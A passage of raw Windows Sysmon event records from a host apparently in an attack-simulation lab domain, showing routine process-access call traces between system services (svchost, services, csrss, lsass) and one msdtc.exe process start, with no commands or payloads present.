15:53:15.678{D28789B6-7C73-5FA1-2C00-000000008801}2800WIN-DC-8070fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 10341000x80000000000000006460Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006459Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006458Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006457Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006456Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006455Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006454Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006453Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006452Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006451Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CF1-5FA1-6401-000000008801}4028C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006450Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C62-5FA1-0A00-000000008801}8522484C:\Windows\system32\services.exe{D28789B6-7CF1-5FA1-6401-000000008801}4028C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006449Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.957{D28789B6-7CF1-5FA1-6401-000000008801}4028C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{D28789B6-7C64-5FA1-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000006448Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006447Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006446Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.950{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006445Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.809{D28789B6-7C62-5FA1-0A00-000000008801}852948C:\Windows\system32\services.exe{D28789B6-7CF1-5FA1-6301-000000008801}4424C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006444Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.809{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CF1-5FA1-6301-000000008801}4424C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006443Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.809{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CF1-5FA1-6301-000000008801}4424C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006442Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.809{D28789B6-7C62-5FA1-0A00-000000008801}8522484C:\Windows\system32\services.exe{D28789B6-7CF1-5FA1-6301-000000008801}4424C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006441Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.809{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006440Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.809{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006439Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.809{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006438Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.684{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006437Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.684{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006436Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.684{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006435Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.606{D28789B6-7C64-5FA1-1400-000000008801}13121400C:\Windows\System32\svchost.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+4609|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006434Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 